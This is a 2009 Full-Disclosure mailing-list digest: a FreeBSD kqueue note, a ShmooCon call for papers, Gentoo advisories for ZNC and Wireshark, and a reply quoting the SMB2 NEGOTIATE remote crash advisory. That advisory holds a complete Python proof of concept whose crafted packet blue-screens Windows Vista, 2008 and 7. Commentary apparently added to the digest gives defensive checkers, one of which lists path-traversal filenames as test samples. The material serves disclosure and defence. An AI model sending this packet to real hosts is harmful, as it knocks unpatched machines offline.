Re: [Full-disclosure] Internet Explorer 8 Crash

2009-09-13 Thread Jeremy Brown
My apologies if this is an isolated bug, but I was getting various
crashes, one being http://i28.tinypic.com/md1bhw.jpg . For those who
couldn't reproduce the bug, sorry for wasting your time.

On Sun, Sep 13, 2009 at 12:42 AM, Kema Druma  wrote:
> Works Fine with SP3 + IE8, Just a hype,
> YOU ANTI-M$ elements :P
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



Re: [Full-disclosure] FreeBSD <= 6.1 kqueue() NULL pointer dereference

2009-09-13 Thread Przemyslaw Frasunek
Przemyslaw Frasunek pisze:
> FreeBSD <= 6.1 suffers from classical check/use race condition on SMP

There is yet another kqueue related vulnerability. It affects 6.x, up to
6.4-STABLE. FreeBSD security team was notified on 29th Aug, but there is no
response until now, so I won't publish any details.

Successful exploitation yields local root and allows escaping from a jail. For now,
you can see a demo at:

http://www.vimeo.com/6554787

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: veng...@czuby.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *



Re: [Full-disclosure] ShmooCon 2010 CFP

2009-09-13 Thread Buherátor
You're still using an SSL cert with an MD5 fingerprint, no good...

2009/9/11 Bruce Potter :
> =
> ShmooCon VI – Call for Papers
> =
>
> February 5-7, 2010 - Wardman Park Marriott, Washington DC, USA
>
> The Shmoo Group is soliciting papers and presentations for the sixth
> annual ShmooCon.
>
> =
> About ShmooCon and The Shmoo Group
> =
>
> The Shmoo Group (TSG) is an independent think-tank of security
> professionals from around the world who donate their time and energy
> towards information security research and development.  Six years ago
> TSG had an idea.  This idea has grown into a community recognized
> security conference attended by over 1500 people.
>
> Although ShmooCon is primarily a security conference, we encourage
> innovative and interesting submissions on offbeat technology topics.
> Greatest consideration will be given to new presentations, but updates
> on existing work are also welcome. We are particularly interested in
> presentations from new faces, therefore we invite any individual who
> has not spoken at a conference before to submit a talk and make
> ShmooCon their inaugural event.
>
> =
> Conference Format
> =
>
> ShmooCon VI has 4 tracks to accommodate a variety of speaking styles
> and topics.
>
> One Track Mind - Technical Tales in Twenty Minutes or Less
> Break It! - Technology Exploitation
>
> Build It! – Creating Inventive Software & Hardware
>
> Bring It On! - Open Discussion of Technology & Security Topics
>
> +++ One Track Mind (Friday Night Only) +++
>
> In One Track Mind, presenters have 20 minutes on Friday night to give
> the entirety of ShmooCon a view into their mind.   Presenters beware:
> You need to be diligent about your use of time as ShmooCon staff
> strictly enforces the 20-minute timeline.  You will have just a few
> minutes for audience questions while we switch to the next talk.   If
> any questions can't be answered in that time, there is space set aside
> for further discussion while One Track Mind marches on.
>
> Topics for One Track Mind may include, but are not limited to:
>
> - Updates to talks given at other conferences
> - Works in Progress
> - Talks that are as much about fun as they are about technology
> - Anything that doesn't need a full hour to explain
>
> +++ Build It!, Break It!, Bring It On! (Saturday and Sunday) +++
>
> All presentations & discussions are 50 minutes in length and presented
> to attendees on either Saturday or Sunday. It is the speaker's
> responsibility to budget time for audience participation and questions
> – 50 minutes is a hard limit.
>
> Presentations in the Build It! and Break It! tracks are strongly
> encouraged to include demonstrations of personally developed
> techniques, working code, and/or devices, with code and/or schematics
> being open-source and released to the public for free. We’re serious
> about this.  We want the community to get something from your
> presentation, not just 50 minutes of hot air.  So PLEASE, in your CFP
> response, indicate what you are releasing that will be of interest.
> If you can’t release code or something similar, be sure your
> techniques and methods are mind blowing.
>
> Presentations in Bring It On! are more open-ended, but presenters are
> strongly encouraged to structure their talk in a way that engages or
> enrages the audience. Gauge for yourself if being pelted by ShmooBalls
> (see below) is positive or negative feedback.  The audience is armed
> and ready to fire.
>
> =
> And Because We Just Can’t Say it Enough
> =
>
> ShmooCon presentations should be focused on topics that are of
> interest to security and technology professionals who are paying
> attention to current trends and issues.  Presentations dealing with
> new technologies such as cloud computing or large-scale virtualization
> or new takes on existing methods and techniques are of interest.
> Presentations that are rehashes of old talks, primers on known
> technologies, or vendor pitches will be rejected and summarily panned.
> We want ShmooCon to be educational and entertaining to the attendees
> and the community at large.  We expect our speakers to be a part of
> that through talks that are well thought out and well presented.
>
> If you feel you have a presentation that would be appropriate but that
> does not meet the guidelines in this CFP, feel free to submit it
> anyway but be sure to include information explaining your reasoning so
> we can better evaluate your proposal.
>
> =
> ShmooBalls
> =
>
> ShmooCon VI continues the tradition of arming attendees with
> ShmooBalls.  One of the major objectives for ShmooCon is to facilitate
> a frank and open discussion of opinions rather than just a one-way
> flow of information from the speaker to the audience. Speakers

[Full-disclosure] [ GLSA 200909-17 ] ZNC: Directory traversal

2009-09-13 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ZNC: Directory traversal
  Date: September 13, 2009
  Bugs: #278684
ID: 200909-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A directory traversal was found in ZNC, allowing for overwriting of
arbitrary files.

Background
==

ZNC is an advanced IRC bouncer.

Affected packages
=

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  net-irc/znc                      < 0.074                 >= 0.074

Description
===

The vendor reported a directory traversal vulnerability when processing
DCC SEND requests.

Impact
==

A remote, authenticated user could send a specially crafted DCC SEND
request to overwrite arbitrary files with the privileges of the user
running ZNC, and possibly cause the execution of arbitrary code e.g. by
uploading a malicious ZNC module.

Workaround
==

There is no known workaround at this time.

Resolution
==

All ZNC users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-irc/znc-0.074

References
==

  [ 1 ] CVE-2009-2658
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2658

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



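The advisory above describes the bug only at the level of "a directory traversal when processing DCC SEND requests" and does not show ZNC's code. As an added illustration of the defensive check involved (written here in Python; it is not ZNC's C++ code and the policy, function names and sample filenames are my own constructions), the following maps an incoming DCC SEND filename to a location inside a download directory and rejects anything that could reach outside it or overwrite an existing file:

```python
import os
import tempfile

# Constructed sample DCC SEND filenames (not taken from the advisory).
SAMPLE_NAMES = [
    "patch.diff",                      # ordinary name: should be accepted
    "../../.znc/modules/evil.so",      # POSIX traversal towards a module directory
    "..\\..\\modules\\evil.so",        # backslash traversal
    "/etc/passwd",                     # absolute path
    "..",                              # bare parent reference
    "",                                # empty name
    "report\x00.txt",                  # embedded NUL
]


def safe_dcc_target(name: str, download_dir: str) -> str:
    """Map an incoming DCC SEND filename to a path inside download_dir.

    Hypothetical policy (not ZNC's): the name must be a single path
    component, must not be '.' or '..', must not contain NUL, and the
    resolved path must stay under download_dir; an existing file is
    never overwritten. Raises ValueError when the name is rejected.
    """
    if not name or "\x00" in name:
        raise ValueError("empty name or embedded NUL")
    # Reject rather than silently strip: a sender has no business naming
    # directories, whichever separator style the client uses.
    if "/" in name or "\\" in name:
        raise ValueError("path separators are not allowed in a DCC filename")
    if name in (".", ".."):
        raise ValueError("refusing '.' or '..'")
    root = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(root, name))
    # Defence in depth: even after the checks above, verify containment
    # on the resolved path (symlinks in download_dir are followed here).
    if os.path.commonpath([root, target]) != root:
        raise ValueError("resolved path escapes the download directory")
    if os.path.lexists(target):
        raise ValueError("refusing to overwrite an existing file")
    return target


def classify_samples(names=SAMPLE_NAMES) -> dict:
    """Run the policy over the sample names inside a throwaway directory."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name in names:
            try:
                safe_dcc_target(name, tmp)
                results[name] = "accepted"
            except ValueError as exc:
                results[name] = f"rejected: {exc}"
    return results


def refuses_overwrite() -> bool:
    """True if an otherwise valid name is rejected because the file exists."""
    with tempfile.TemporaryDirectory() as tmp:
        open(os.path.join(tmp, "existing.txt"), "w").close()
        try:
            safe_dcc_target("existing.txt", tmp)
        except ValueError:
            return True
    return False


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name!r:36} -> {verdict}")
    print("overwrite refused:", refuses_overwrite())
```

The containment check on the resolved path is deliberately redundant with the separator check; keeping both means a future change to the name policy cannot quietly reintroduce a traversal.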

[Full-disclosure] [ GLSA 200909-16 ] Wireshark: Denial of Service

2009-09-13 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Wireshark: Denial of Service
  Date: September 13, 2009
  Bugs: #278564
ID: 200909-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in Wireshark which allow
for Denial of Service.

Background
==

Wireshark is a versatile network protocol analyzer.

Affected packages
=

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/wireshark           < 1.2.1                 >= 1.2.1

Description
===

Multiple vulnerabilities were discovered in Wireshark:

* A buffer overflow in the IPMI dissector related to an array index
  error (CVE-2009-2559).

* Multiple unspecified vulnerabilities in the Bluetooth L2CAP,
  RADIUS, and MIOP dissectors (CVE-2009-2560).

* An unspecified vulnerability in the sFlow dissector
  (CVE-2009-2561).

* An unspecified vulnerability in the AFS dissector (CVE-2009-2562).

* An unspecified vulnerability in the Infiniband dissector when
  running on unspecified platforms (CVE-2009-2563).

Impact
==

A remote attacker could exploit these vulnerabilities by sending
specially crafted packets on a network being monitored by Wireshark or
by enticing a user to read a malformed packet trace file to cause a
Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Wireshark users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-analyzer/wireshark-1.2.1

References
==

  [ 1 ] CVE-2009-2559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2559
  [ 2 ] CVE-2009-2560
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2560
  [ 3 ] CVE-2009-2561
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2561
  [ 4 ] CVE-2009-2562
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2562
  [ 5 ] CVE-2009-2563
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2563

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-13 Thread Randal T. Rioux
After testing my version of the exploit (using Java instead of Python) I 
tried it against a Windows Server 2008 R2 installation - it went down.

http://www.procyonlabs.com/software/smb2_bsoder

Randy


laurent gaffie wrote:
> Advisory updated :
> 
> 
> =
> - Release date: September 7th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: High
> =
> 
> I. VULNERABILITY
> -
> Windows Vista, Server 2008 < R2, 7 RC :
> SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
> 
> II. BACKGROUND
> -
> Windows Vista and newer Windows versions come with a new SMB version named SMB2.
> See: 
> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
> for more details.
> 
> III. DESCRIPTION
> -
> [Edit] Unfortunately this SMB2 security issue is specifically due to an MS 
> patch for another SMB2.0 security issue:
> KB942624 (MS07-063)
> Installing only this specific update on Vista SP0 creates the following 
> issue:
> 
> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE 
> PROTOCOL REQUEST functionality.
> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an 
> SMB server, and it's used to identify the SMB dialect that will be used 
> for further communication.
> 
> IV. PROOF OF CONCEPT
> -
> 
> Smb-Bsod.py:
> 
> #!/usr/bin/python
> #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
> #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
> 
> from socket import socket
> 
> host = "IP_ADDR", 445
> buff = (
> "\x00\x00\x00\x90" # Begin SMB header: Session message
> "\xff\x53\x4d\x42" # Server Component: SMB
> "\x72\x00\x00\x00" # Negociate Protocol
> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
> "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
> "\x30\x30\x32\x00"
> )
> s = socket()
> s.connect(host)
> s.send(buff)
> s.close()
> 
> V. BUSINESS IMPACT
> -
> An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.
> Windows XP and 2k are NOT affected as they don't have this driver.
> 
> VI. SYSTEMS AFFECTED
> -
> [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 
> < R2, Windows 7 RC.
> 
> VII. SOLUTION
> -
> No patch is available for the moment.
> Disable the SMB feature and close its ports until a patch is provided.
> Configure your firewall properly.
> You can also follow the MS Workaround:
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> 
> VIII. REFERENCES
> -
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
> 
> IX. CREDITS
> -
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com 
> 
> X. REVISION HISTORY
> -
> September 7th, 2009: Initial release
> September 11th, 2009: Revision 1.0 release
> 
> XI. LEGAL NOTICES
> -
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
> 
> XII.Personal Notes
> -
> Many people have suggested updating this advisory to RCE rather than BSOD:
> it won't be done; if they find a way to execute code, they will publish 
> their own advisory.

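The quoted advisory pins the crash on the two "Process ID High" bytes of the SMB header in a NEGOTIATE PROTOCOL REQUEST, which it says are normally zero. From a monitoring point of view that is a concrete, checkable property of the first message on every SMB session. The following is an added example (mine, not the advisory author's PoC, and not from any Microsoft or IDS code) of a parser for the NetBIOS session header plus the 32-byte SMB1 header, with a check that flags a NEGOTIATE carrying a non-zero Process ID High. The two sample frames are constructed here with a stub body and no dialect list; the field layout follows the comments in the advisory's header dump.

```python
import struct

NETBIOS_SESSION_MESSAGE = 0x00
SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72

# Constructed sample frames (not the advisory's PoC): 4-byte NetBIOS session
# header, 32-byte SMB1 header, then a 3-byte stub body (word count 0,
# byte count 0). Declared NetBIOS length = 32 + 3 = 35 = 0x23.
_SMB_PREFIX = (SMB_MAGIC
               + b"\x72"               # command: NEGOTIATE
               + b"\x00\x00\x00\x00"   # NT status
               + b"\x18"               # flags
               + b"\x53\xc8")          # flags2 (little-endian 0xc853)
_SMB_SUFFIX = (b"\x00" * 8             # signature
               + b"\x00\x00"           # reserved
               + b"\xff\xff"           # TID
               + b"\xff\xfe"           # PID (low)
               + b"\x00\x00"           # UID
               + b"\x00\x00"           # MID
               + b"\x00\x00\x00")      # stub body
NORMAL_FRAME = b"\x00\x00\x00\x23" + _SMB_PREFIX + b"\x00\x00" + _SMB_SUFFIX
SUSPICIOUS_FRAME = b"\x00\x00\x00\x23" + _SMB_PREFIX + b"\x00\x26" + _SMB_SUFFIX


def parse_smb1_header(frame: bytes) -> dict:
    """Parse a NetBIOS session header followed by an SMB1 header.

    Raises ValueError if the frame is too short, is not a session message,
    or lacks the SMB magic.
    """
    if len(frame) < 36:
        raise ValueError("frame too short for NetBIOS + SMB header")
    if frame[0] != NETBIOS_SESSION_MESSAGE:
        raise ValueError(f"unexpected NetBIOS message type 0x{frame[0]:02x}")
    netbios_length = int.from_bytes(frame[1:4], "big")
    smb = frame[4:36]
    if smb[:4] != SMB_MAGIC:
        raise ValueError("missing SMB magic")
    # All SMB header fields are little-endian; no alignment padding.
    command, status, flags, flags2, pid_high = struct.unpack_from("<BIBHH", smb, 4)
    signature, reserved, tid, pid, uid, mid = struct.unpack_from("<8sHHHHH", smb, 14)
    return {
        "netbios_length": netbios_length,
        "command": command, "status": status, "flags": flags, "flags2": flags2,
        "pid_high": pid_high, "signature": signature, "reserved": reserved,
        "tid": tid, "pid": pid, "uid": uid, "mid": mid,
    }


def check_negotiate(frame: bytes):
    """Return a reason string if the frame is a NEGOTIATE request that looks
    malformed in the way the advisory describes, or None if it looks normal.
    Non-NEGOTIATE commands are not examined here."""
    try:
        h = parse_smb1_header(frame)
    except ValueError as exc:
        return f"unparseable: {exc}"
    if h["command"] != SMB_COM_NEGOTIATE:
        return None
    if h["netbios_length"] != len(frame) - 4:
        return (f"NetBIOS length {h['netbios_length']} != payload length "
                f"{len(frame) - 4}")
    if h["pid_high"] != 0:
        return f"NEGOTIATE with non-zero Process ID High 0x{h['pid_high']:04x}"
    return None


if __name__ == "__main__":
    for label, frame in (("normal", NORMAL_FRAME), ("suspicious", SUSPICIOUS_FRAME)):
        print(f"{label:10} -> {check_negotiate(frame)}")
```

A check like this belongs at a capture or IDS tap in front of the server; it is an indicator for alerting, not a substitute for the vendor workaround or patch the advisory points to.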